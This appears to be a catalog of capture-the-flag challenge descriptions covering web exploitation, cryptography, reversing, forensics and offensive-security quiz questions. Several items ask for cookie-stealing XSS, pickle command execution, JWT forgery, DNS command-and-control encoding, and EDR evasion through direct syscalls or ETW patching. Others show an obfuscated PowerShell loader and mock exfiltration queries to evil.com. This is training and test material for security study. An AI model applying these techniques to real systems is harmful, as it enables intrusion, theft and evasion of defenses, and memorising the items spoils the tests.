Filter by category, difficulty, type, and completion status — the catalog covers everything from web security MCQs to multi-stage exploit machines.
The search page writes your query straight into the results DOM, and the active session already carries a secret_flag cookie. Execute JavaScript in the page origin and recover the cookie value.
A message has been encrypted using a Caesar cipher with an unknown shift. ## Ciphertext ``` IODJ{fdhvdu_flskhu_lv_hdvb} ``` Write a Python function to brute-force all possible shifts and find the flag.
You are signed in as employee 1337, but the profile API accepts a user ID parameter without checking ownership. Enumerate nearby IDs and retrieve a record that should only be visible to a more privileged account.
A vulnerable login page is running at the target. Use SQL injection to bypass authentication and log in as admin to retrieve the flag.
Analyze this password checking function and find the correct password. ## Disassembly ```nasm check_password: push rbp mov rbp, rsp mov rax, [rdi] ; Load first 8 bytes of input mov rcx, 0x1337133713371337 ; XOR key xor rax, rcx mov rdx, 0x324120454c45234f ; Expected result cmp rax, rdx jne .fail mov eax, 1 jmp .done .fail: xor eax, eax .done: pop rbp ret ``` Analyze the comparison and the XOR operation to determine what input passes the check. Submit the password wrapped in FLAG{}.
A message was XOR'd with a single-byte key. Crack it using frequency analysis. ## Ciphertext (hex) ``` 1c161b1d21226a28056b290528692c6928296b38366927 ``` The plaintext is English text. Find the key and decode the message.
A company's internal portal contains sensitive employee data. You've been given the URL during a penetration test. Gain administrative access to retrieve confidential information. **Target:** ACME Corp Employee Portal
The search functionality on this page reflects user input without sanitization. The flag is stored in a cookie called `secret_flag`. Craft an XSS payload that executes JavaScript to alert the flag cookie.
Search Portal reflects user input inside the search results page and loads an administrator session in the same origin during review. Trigger XSS in the live app, steal the admin session token, and submit it as proof. **Target:** Search Portal - A search application under security review
The comment form stores and re-renders submitted HTML for every visitor, and an admin session opens the page with an admin_session cookie set. Plant a comment that executes on reload and recover the admin cookie value.
Analyze the following ARP table logs to identify a potential ARP spoofing attack. ## ARP Table at 10:00:00 ``` IP Address MAC Address 192.168.1.1 aa:bb:cc:dd:ee:01 192.168.1.100 aa:bb:cc:dd:ee:64 192.168.1.50 aa:bb:cc:dd:ee:32 ``` ## ARP Table at 10:05:00 ``` IP Address MAC Address 192.168.1.1 aa:bb:cc:dd:ee:64 192.168.1.100 aa:bb:cc:dd:ee:64 192.168.1.50 aa:bb:cc:dd:ee:32 ``` Determine which IP address is being spoofed and identify the attacker's IP. Submit answer as: FLAG{spoofed_ip:attacker_ip}
Analyze these Apache logs to find the attacker's IP and the vulnerability being exploited. ## Logs ``` 192.168.1.100 - - [15/Jan/2024:10:00:01] "GET /index.php HTTP/1.1" 200 1234 192.168.1.50 - - [15/Jan/2024:10:00:05] "GET /admin/login.php HTTP/1.1" 200 567 192.168.1.50 - - [15/Jan/2024:10:00:10] "POST /admin/login.php HTTP/1.1" 302 0 192.168.1.200 - - [15/Jan/2024:10:00:15] "GET /?id=1' OR '1'='1 HTTP/1.1" 200 5678 192.168.1.200 - - [15/Jan/2024:10:00:20] "GET /?id=1' UNION SELECT username,password FROM users-- HTTP/1.1" 200 9012 192.168.1.100 - - [15/Jan/2024:10:00:25] "GET /about.php HTTP/1.1" 200 2345 ``` Submit flag as: FLAG{attacker_ip:vulnerability_type} Example: FLAG{1.2.3.4:xss}
Given multiple encrypted blocks, determine if ECB mode was used. ## Encrypted Data (hex, 16-byte blocks) ``` deadbeefcafebabe12345678aabbccdddeadbeefcafebabe12345678aabbccdd1122334455667788aabbccddeeff0011 ``` ECB mode is detected by looking for repeated blocks.
You've discovered an internal employee directory API. It seems to expose more information than intended. Find and access restricted employee data. **Target:** HR Employee API v2
Extract readable strings from this simulated memory dump to find credentials. ## Memory Dump (hex) ``` 00 00 00 75 73 65 72 3a 61 64 6d 69 6e 00 00 00 00 70 61 73 73 3a 46 4c 41 47 7b 6d 33 6d 30 72 79 5f 66 30 72 33 6e 73 31 63 73 7d 00 00 00 00 ``` Extract the password which is the flag.
You've captured a TCP segment containing an HTTP POST to a login endpoint. The data is URL-encoded. Parse the raw HTTP body, handle encoded special characters, and extract the password.
The admin login form builds its authentication query unsafely and returns a flag only to an administrator session. Break the login check with SQL injection, impersonate admin, and recover the flag.
Parse the DNS records to extract all subdomains for target.com. ## DNS Records ``` target.com. A 192.168.1.1 www.target.com. A 192.168.1.2 mail.target.com. A 192.168.1.3 dev.target.com. A 192.168.1.4 api.target.com. A 192.168.1.5 secret.target.com. A 192.168.1.6 ``` Return sorted list of subdomains (not including root domain). **Output:** Print the sorted Python list of subdomain names (e.g., `['api', 'dev', 'mail']`).
You receive a suspicious email claiming to be from your CEO. Analyze these headers: ``` From: John Smith <[email protected]> Received: from mail.yourcompany.com (192.168.1.10) by mx.google.com with SMTP Received: from smtp.external-mail.net (203.0.113.50) by mail.yourcompany.com with ESMTP Authentication-Results: mx.google.com; spf=none [email protected]; dkim=pass header.d=yourcompany.com; dmarc=fail (p=none) ``` What is the strongest indicator that this email is spoofed?
An API uses predictable user IDs. Your user ID is 1337. The endpoint is `GET /api/users/{id}`. Find the admin user's data and retrieve the flag.
You've extracted these IOCs from a new malware sample and need to prioritize threat intel sharing. Your SIEM shows: ``` IOC | Hits in last 30 days | Notes -----------------------------|----------------------|------------------ evil-c2.com | 0 | Registered yesterday 185.143.223.47 | 847 | AWS IP, rotates daily svchost32.exe (in System32) | 0 | Unusual binary name Mozilla/5.0 (Botnet v2.1) | 12 | Custom User-Agent ``` Which IOC provides the HIGHEST value for proactive defense and sharing with other organizations?
A string has been encoded multiple times with different schemes. Detect the encoding type at each layer and decode. ## Encoded Data ``` 526b784252337474645778304d5639734e486b7a636c396b4d324d775a444e39 ``` Identify the encoding at each layer and decode to reveal the flag.
You performed a service scan on a web server. Analyze the output to prioritize your attack: ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 80/tcp open http Apache httpd 2.4.54 443/tcp open ssl/https Apache httpd 2.4.54 3000/tcp open http Node.js (Express) 6379/tcp open redis Redis 6.2.6 8080/tcp open http-proxy HAProxy 2.4 9200/tcp open http Elasticsearch 7.17.0 ``` CVE Database shows: - OpenSSH 8.9p1: No critical CVEs - Apache 2.4.54: No critical CVEs - Redis 6.2.6: CVE-2022-0543 (Lua sandbox escape, requires auth) - Elasticsearch 7.17.0: CVE-2021-44228 (Log4Shell, if log4j used) Assuming default configurations, which service should be your FIRST target?
You're analyzing a server under attack. Running `netstat -an | grep -c SYN_RECV` returns 15000, while `netstat -an | grep -c ESTABLISHED` returns only 50. The server has `net.ipv4.tcp_syncookies = 0` and `net.ipv4.tcp_max_syn_backlog = 1024`. What is happening and what is the IMMEDIATE consequence?
You are investigating a target and find their data in multiple breaches: **LinkedIn 2012 breach:** [email protected], password hash: 5f4dcc3b5aa765d61d8327deb882cf99 **Adobe 2013 breach:** [email protected], encrypted hint: "pet name" **Dropbox 2012 breach:** [email protected], bcrypt hash: $2a$10$... **MyFitnessPal 2018:** [email protected], SHA-1 hash The LinkedIn hash (MD5) cracks to "password". Based on password reuse patterns, which account is MOST likely to still be compromised with this password?
A web application implements CSRF protection using tokens. You notice the following behavior: 1. The CSRF token is stored in a cookie named 'csrf_token' 2. The application checks if the 'X-CSRF-Token' header matches the cookie value 3. The cookie has SameSite=None Which attack vector is MOST likely to succeed?
A modern user management API built on MongoDB. The development team switched from SQL to avoid "injection problems." They didn't realize NoSQL has its own dangers. **Target:** UserVault API v2
FileShare serves user-selected paths from a collaboration portal and trusts the requested filename too much. Break out of the shared directory, read a restricted system file, and recover the flag. **Target:** FileShare v4.0
LinkSnap fetches attacker-controlled URLs to build previews and can reach internal services that the public internet cannot. Use the preview worker to pivot into the internal network, find the hidden service, and recover the flag. **Target:** LinkSnap Preview Generator
A URL preview worker fetches user-supplied URLs and can reach internal services that the public site cannot. ## Vulnerable Endpoint ``` POST /api/preview Content-Type: application/json {"url": "https://example.com"} ``` Pivot through the preview endpoint, reach the internal admin-only service, and recover the hidden flag.
Create a polymorphic XOR encoder that eliminates null bytes from shellcode. Find a single-byte XOR key that removes all null bytes and output the encoded payload. ## Input First line: hex-encoded shellcode (may contain null bytes) ## Output ``` Line 1: The XOR key (decimal) Line 2: Hex-encoded result (no null bytes) ``` Use the smallest valid key (try keys 1-255 in order). If no key eliminates all null bytes, print `NO_VALID_KEY`.
The server uses JWT for authentication but has a critical flaw in algorithm verification. You have a valid guest token: ``` eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QiLCJhZG1pbiI6ZmFsc2V9.signature ``` Write Python code that forges a JWT to gain admin access by exploiting the algorithm validation.
The catalog search concatenates your input into a backend SQL query and prints the returned rows directly into the page. Break out of the search term, UNION in another result set, and extract data beyond the product listings.
The profile viewer reads both query-string and fragment data in client-side JavaScript before writing it into the page. Trace the browser-side sinks, trigger DOM XSS, and recover the auth token from the current session.
An attacker exfiltrated data using DNS queries. Each subdomain contains base64-encoded data chunks. ## Captured DNS Queries ``` RkxBR3tkbnNfM3hm.evil.com MWx0cjR0MTBuX2Q=.evil.com M3QzY3QzZH0=.evil.com ``` Write Python code to reconstruct the exfiltrated data from these DNS queries.
Carve embedded files from a memory dump by detecting magic bytes. Write a file carver that scans a byte stream for known file signatures, extracts the offset and type of each file found, and handles overlapping files correctly. ## Known Signatures - PNG: 89 50 4E 47 0D 0A 1A 0A - JPEG: FF D8 FF E0 or FF D8 FF E1 - PDF: 25 50 44 46 (% P D F) - ZIP: 50 4B 03 04 **Output Format:** ``` TYPE at offset N ``` Use these type names: PNG, JPEG, PDF, ZIP. One line per file found, sorted by offset.
You've obtained document metadata from leaked files. Correlate the data to identify the leak source. Analyze metadata from multiple documents to correlate software fingerprints, authorship patterns, and creation timing. Return the likely source employee.
You've obtained a GraphQL introspection response from a target API. The developers left a backdoor mutation accessible without authentication. Analyze the schema to find the unprotected mutation that can reset passwords and return its name. ## Input The schema data will be passed as a JSON string.
The malware config is XOR encrypted. Extract the C2 server. ## Encrypted Config (hex) ``` 24 75 69 22 31 2e 2b 6a 2f 36 69 24 28 2a 68 26 37 2e ``` ## Key: 0x47 Decrypt to find the C2 URL.
Analyze Windows registry autorun entries to identify malware persistence. Write a function that examines Run key entries, flags suspicious ones based on path and naming anomalies, and returns the suspicious entry name with a suspicion score (0-100). **Scoring Rules (0-100 per entry):** - Path in Users\\Public: +40 points - Executable name matches a system process (svchost, csrss, lsass, services, winlogon): +30 points - Entry name doesn't appear in the executable path: +20 points - Path in ProgramData but not under Microsoft: +10 points **Output Format:** One line per suspicious entry (score > 0), sorted by score descending: ``` entryName: score ```
The flag is hidden in this obfuscated array. Each character is XOR'd with its index. ## Obfuscated Data ```python data = [70, 77, 67, 68, 127, 125, 54, 117, 87, 109, 57, 104, 126, 116, 126, 123, 33, 33, 124, 110] ``` Reverse the obfuscation to find the flag.
A Snort deployment raised alerts during your first SYN scan. You stop, read the rules below, and need to choose the next scan that avoids both detections: ``` alert tcp any any -> $HOME_NET any (flags:S; threshold:type both, track by_src, count 100, seconds 60; sid:1000001;) alert tcp any any -> $HOME_NET any (msg:"Nmap fingerprint"; content:"|00 00 40 00 00 00|"; sid:1000002;) ``` Which scan change bypasses both rules as written?
You're scoping a physical penetration test of a corporate HQ. Recon reveals: - **Access control:** HID iCLASS SE cards with anti-cloning features - **Reception:** Manned 24/7, visitor badges printed with photo - **Loading dock:** Card reader + PIN, camera coverage, guard patrols every 30min - **Parking garage:** Card only, connects to elevator requiring separate badge - **Smoker's area:** Employees exit through alarmed door, prop it open with rock Based on risk/reward and avoiding detection, which entry vector should you PRIORITIZE?
You need to patch a conditional jump to always take the "success" path. ## Original Assembly ```nasm cmp eax, 0x1337 jne fail ; 75 0A (jump if not equal) ; success path call print_flag ``` What should "75 0A" be changed to?
You're analyzing a photo with EXIF data stripped. The image shows: - A street sign reading "Jalan Sudirman" - A building with signage "Bank Mandiri" - Traffic on the LEFT side of the road - A mosque minaret visible in the background - Time on a visible clock: 3:47 PM - Shadow angle suggests sun is in the west Based on these clues, where was this photo MOST LIKELY taken?
You're planning a social engineering assessment against a financial services company. OSINT reveals: - **Target:** Sarah Chen, Senior Developer - **LinkedIn:** Posts about work-life balance struggles, mentions "always on-call" - **Twitter:** Frustrated tweets about "legacy code" and "technical debt" - **GitHub:** Active contributor to open-source security tools - **Company blog:** Recently featured for "innovative solutions" Which pretext has the HIGHEST probability of success for initial engagement?
You've captured traffic from a WPA2-Enterprise network (802.1X/EAP). Analysis shows: - SSID: "CorpSecure" - Authentication: EAP-PEAP with MSCHAPv2 - Several clients connecting throughout the day - One captured handshake from user "jsmith" Your target is obtaining domain credentials. Which approach is MOST effective?
You're the IT Security lead. An employee forwards you this email they received: ``` From: [email protected] Subject: Urgent: VPN Certificate Expiration Your VPN certificate expires in 24 hours. To avoid losing access, call our support line immediately: +1-888-555-0147 If you cannot call, reply to this email with your employee ID and we will renew it remotely. ``` You check: the From address passes SPF/DKIM, and the phone number is NOT your company's help desk. What is the MOST LIKELY attack being attempted?
You're analyzing a system with these password storage implementations: **System A:** `SHA256(password)` - no salt **System B:** `MD5(salt + password)` - 16-byte random salt per user **System C:** `bcrypt(password, cost=10)` **System D:** `SHA256(SHA256(password))` - double hashing You have obtained a database dump with 10,000 password hashes. Which system is MOST vulnerable to an attack that recovers the MOST passwords in 24 hours using a GPU cluster?
Sandbox analysis shows these behaviors: ``` [+] Process: sample.exe (PID 2847) [+] Mutex created: Global\{8F14E45F-CEEA-4F6A-A42E} [+] File created: C:\Users\Public\svchost.exe (copy of self) [+] Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate [+] Network: TCP connection to 185.143.XX.XX:443 (TLS) [+] API Hooks installed: NtQuerySystemInformation, NtOpenProcess [+] Memory scan: Found AES-256 key material [+] Disk activity: Scanning all drives for files matching *.doc, *.pdf, *.xlsx [+] File activity: 847 files renamed with .encrypted extension [+] New file: C:\Users\Public\README_RESTORE.txt ``` Based on the COMPLETE behavior profile, what is the PRIMARY classification?
A warehouse inventory system with search and order tracking. Error messages are suppressed; use response behavior and timing to extract data. **Target:** StockPile Inventory System
A single sign-on platform that provides OAuth authentication for enterprise applications. Users trust it with their credentials. The OAuth implementation has subtle flaws. Redirect URIs aren't always what they seem. **Target:** CloudGate SSO Platform
A developer networking platform with a GraphQL API and restricted introspection. Enumerate available operations and access protected data paths. **Target:** DevConnect GraphQL API
A document processing API that parses uploaded XML files for configuration and reports. Use XML parser behavior to access restricted data. **Target:** DocParser XML API
A marketing automation platform that lets users create custom email templates. Variables like {{name}} are replaced with user data. The preview feature shows exactly what the email will look like. Maybe it shows a bit too much. **Target:** EmailCraft Template Builder
An IT team built an internal network diagnostic tool. They added input filtering after a previous incident. Retrieve the admin credentials stored on the server. **Target:** NetOps v2.1 - Network Operations Dashboard
A SaaS company uses a proxy service to fetch external resources. Their security team implemented URL filtering. The infrastructure runs on a cloud provider with standard metadata services. **Target:** CloudProxy Gateway
The transfer endpoint at `POST /api/transfer` checks your balance and debits it in separate steps, so concurrent requests can race the ledger. Send overlapping transfers until the account goes negative and recover the flag.
A Flask application uses Jinja2 templates unsafely. Exploit SSTI to read /etc/flag. ## Vulnerable Code ```python @app.route('/hello') def hello(): name = request.args.get('name', 'World') template = f"Hello {name}!" return render_template_string(template) ``` ## Test `/hello?name={{7*7}}` returns "Hello 49!" Craft a payload to read the flag file.
Analyze memory dump artifacts to detect process hollowing. Process hollowing unmaps the legitimate executable and maps malicious code, leaving detectable indicators in PEB base addresses, entry points, and section permissions. ## Input Format ``` PEB_ImageBase: 0x00400000 Mapped_Base: 0x00400000 Entry_Point: 0x00401000 Section_.text: 0x00401000-0x00405000 RX Section_.data: 0x00406000-0x00408000 RW Memory_0x00401000: RWX ``` **Detection Rules:** - If PEB_ImageBase != Mapped_Base: report `base_mismatch` - If any memory region has RWX permissions where the corresponding section is RX: report `RWX_in_text_section` **Output Format:** `HOLLOWED: reason1, reason2` or `CLEAN`
A Node.js application uses a vulnerable merge function. Exploit prototype pollution to achieve RCE. ## Vulnerable Code ```javascript function merge(target, source) { for (let key in source) { if (typeof source[key] === 'object') { target[key] = merge(target[key] || {}, source[key]); } else { target[key] = source[key]; } } return target; } ``` ## Endpoint ``` POST /api/settings Content-Type: application/json {"theme": "dark"} ``` Pollute Object.prototype, redirect execution through the merge path, and recover code execution.
An API endpoint accepts XML for data import. The XML parser has not been hardened. ## Vulnerable Endpoint ``` POST /api/import Content-Type: application/xml <user> <name>Test</name> </user> ``` Exploit the XML parser to read a sensitive file from the server. The flag is stored somewhere on disk.
A password check function has a timing side-channel. Write code to exploit it. ## Vulnerable Comparison ```python def check_password(input_pwd, correct_pwd): for i in range(len(input_pwd)): if input_pwd[i] != correct_pwd[i]: return False time.sleep(0.01) # Side channel! return len(input_pwd) == len(correct_pwd) ``` Measure timing to discover the password character by character.
Implement a DNS-based C2 protocol encoder/decoder. ## Protocol Specification Commands are encoded in DNS TXT queries: 1. XOR with rolling key (starting 0x41, increment by 1) 2. Base32 encode result 3. Split into 63-char labels 4. Append .c2domain.com ## Input Line 1: "ENCODE" or "DECODE" Line 2: The data ## Output Encoded query or decoded command
Implement a function name resolver using the ROR13 hashing algorithm commonly used in shellcode. ## ROR13 Algorithm ``` hash = 0 for each char in string: hash = ror(hash, 13) hash += char ``` Where ror(value, bits) rotates right within 32 bits. Given a hash and a list of API names, find the matching function. ## Input Line 1: Target hash (hex, e.g., 0x7c0dfcaa) Line 2: Comma-separated function names ## Output The matching function name or "NOT_FOUND"
The RSA key was generated with small primes. Factor n, compute the private key d, and decrypt c to find the flag (as ASCII). - n = 3233 (public modulus) - e = 17 (public exponent) - c = 2790 (ciphertext) **Output:** Print the decrypted plaintext as a decimal integer.
A malicious PowerShell script uses multiple obfuscation layers. Deobfuscate it. ## Obfuscated Script ```powershell $a = [char]105 + [char]69 + [char]88 # Builds "iEX" $b = 'JGM9W1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGODo6R2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoIlpteEFaM3RqYjI1allYUmZjM1J5YVc1bmZRPT0iKSk=' $d = [System.Text.Encoding]::UTF8::GetString([System.Convert]::FromBase64String($b)) & ([scriptblock]::Create("$a $d")) ``` Write code to strip away each obfuscation layer and reveal the final payload.
A message has been hidden using LSB steganography in the pixel data below. Extract it. ## Pixel Data (R, G, B values) ```python pixels = [ (180, 115, 102), (194, 134, 131), (129, 116, 194), (113, 186, 194), (169, 111, 174), (154, 104, 103), (110, 126, 128), (164, 176, 103), (170, 125, 190), (182, 188, 169), (153, 129, 156), (175, 135, 101), (197, 120, 189), (155, 142, 135), (119, 126, 197), (143, 112, 110), (148, 113, 145), (145, 176, 132), (105, 193, 158), (169, 115, 148), (110, 170, 137), (180, 178, 147), (173, 125, 191), (109, 104, 185) ] ``` Extract the hidden message from the pixel data.
Malware often hooks Windows APIs. How can you detect if NtReadVirtualMemory is hooked?
OMEGA is the proving ground -- a sprawling platform with an aggressive CDN cache layer, a custom authentication service, internal-only routing between microservices, and a JavaScript sandbox meant to safely evaluate user expressions. Every component was audited individually, but nobody tested what happens when they interact. Break through all four layers to reach the flag.
ECLIPSE is a threat intelligence platform where analysts submit reports that are reviewed by an automated admin bot. The platform also exposes a search endpoint and an out-of-band callback tester for integration work. A persistent payload in the right place will execute under the bot's privileged session, and the backend has injection points of its own.
Apex Solutions is a mid-size consultancy whose web platform went live six months ago. It exposes a health check endpoint, a self-service password reset flow, authentication APIs, and an admin panel that was supposed to be internal-only. Each component was built by a different contractor, and the seams between them are showing. Gain admin-level access to retrieve the flag.
BLACKSITE Operations is a classified intelligence portal cobbled together during a crisis and never properly secured. Somewhere behind its login walls and buried routes sit documents that were never meant to be accessible remotely. Weak credentials, overlooked configuration files, and sloppy file access controls are your way in.
Genesis Protocol is a cryptocurrency trading desk that authenticates every API call with a custom HMAC signature scheme. The engineering team was proud of their "military-grade" signing, but the implementation leaves openings in how secrets are managed and signatures are verified. Forge the right request to execute a privileged trade and claim the flag.
ZERO-HOUR Financial is a fintech startup that just launched its transfer, coupon redemption, and premium upgrade features. The backend processes certain operations with a noticeable delay, and the developers assumed single-threaded request handling. Race the server's own logic to reach a state it was never designed to allow.
A regional hospital recently deployed Chimera, an electronic health records system that handles patient file uploads, role-based access control, and dynamic report generation. An insider threat tip suggests the system's file handling and template rendering were never hardened. Find a way through the layers to reach the flag.
HYDRA Systems is an enterprise integration hub connecting dozens of internal services through APIs, webhook callbacks, and a token-based auth layer. A recent audit flagged several endpoints for insufficient input validation, and the token format is suspiciously simple. Escalate from a standard API consumer to full administrative control.
Singularity AI is a managed LLM platform where teams build prompt templates, tune model parameters, and deploy inference endpoints. The platform's input handling trusts user-supplied content a little too broadly, and some configuration endpoints lack proper authorization. Find the path from a normal user session to restricted internal data.
PhantomBank lets customers manage accounts through a web portal backed by JWT-based sessions and several internal microservices. During a routine security assessment you notice the authentication layer exposes more than it should, and the backend services trust each other implicitly. Exploit the gaps between these trust boundaries to reach the flag.
An API gateway that routes requests to internal microservices. The gateway and backend parse HTTP slightly differently. When two systems disagree on where a request ends, interesting things happen. **Target:** GatewayX API Gateway
A secrets management platform used by organizations. Multiple endpoints interact with shared auth/session logic. Find and chain vulnerabilities to retrieve the flag. **Target:** SecureVault v3.2.1
A content delivery network with aggressive caching for maximum performance. Assets are cached and served to thousands of users. Performance optimizations often come with security trade-offs. What appears in responses to one user might affect others. **Target:** SpeedCDN Edge Server
A modern task management platform built with Node.js. The application stores task configurations in a custom serialization format for "performance." The development team implemented a session persistence feature that looked harmless in code review. **Target:** TaskFlow
A real-time configuration management platform. Teams use it to store and merge JSON configurations across environments. Complex object operations can lead to unexpected behavior. Understanding how JavaScript handles objects is key. **Target:** ConfigiX Platform
A centralized authentication service used across multiple applications. Gain administrative access. **Target:** AuthProxy SSO Gateway
A cryptocurrency wallet service with withdrawal functionality. You have $10 in your account. The flag costs $1000. **Target:** CryptoWallet API
A vulnerable program has a heap overflow. Corrupt heap metadata to gain control. ## Binary Analysis - malloc() allocates chunks with metadata headers - Two adjacent heap chunks are allocated sequentially - The first chunk has an unbounded copy operation - The second chunk contains a function pointer that gets called later Overflow the first chunk to overwrite the function pointer in the second chunk, redirecting execution to the win() function. Submit the payload size and the target address in the flag format: FLAG{size:hex_address}
A Python Flask app uses pickle for session handling. Craft a malicious payload. ## Vulnerable Code ```python import pickle import base64 data = base64.b64decode(cookie) session = pickle.loads(data) # Vulnerable! ``` Create a pickle payload that when deserialized achieves arbitrary command execution and prints the flag. The test will deserialize your payload and check that it executes `echo 'FLAG{...}'` successfully. Your `print()` statement shows the encoded payload for inspection.
Parse a PE file's import table to resolve dependencies for reflective loading. Given the hex of a PE's import directory, extract: 1. DLL names 2. Function names/ordinals for each DLL ## Import Directory Entry (20 bytes each) ``` Offset 0: OriginalFirstThunk RVA (4 bytes) Offset 4: TimeDateStamp (4 bytes) Offset 8: ForwarderChain (4 bytes) Offset 12: Name RVA (4 bytes) -> DLL name Offset 16: FirstThunk RVA (4 bytes) ``` ## Input Line 1: Import directory hex Line 2: Comma-separated mappings of RVA:string (for name resolution) **Output Format:** One line per DLL found in the import directory: ``` dll_name:function1,function2 ``` Functions are resolved from the RVA map where RVA >= 0x3000. If a DLL has no resolved functions, print just the DLL name followed by a colon.
Extract syscall numbers (SSNs) from ntdll to implement direct syscalls and bypass usermode hooks. Modern EDRs hook ntdll functions; direct syscalls bypass these by extracting the SSN from the stub and calling the syscall instruction directly. ## Syscall Stub Pattern (x64) ``` 4C 8B D1 mov r10, rcx B8 XX 00 00 00 mov eax, SSN ; XX is the syscall number 0F 05 syscall C3 ret ``` ## Input Hex bytes of a syscall stub ## Output The syscall number (decimal)
Analyze this ETW patching technique and identify the critical bytes. ## Technique To blind ETW telemetry, malware patches EtwEventWrite so it never executes: ``` Original: 4C 8B DC mov r11, rsp 49 89 5B 08 mov [r11+8], rbx ... ``` Determine the minimal patch needed to neutralize this function. The flag is the MD5 hash of those patch bytes as a lowercase hex string.
You have a kernel exploit that gives you write-what-where. What is the MOST reliable method to escalate privileges on modern Linux?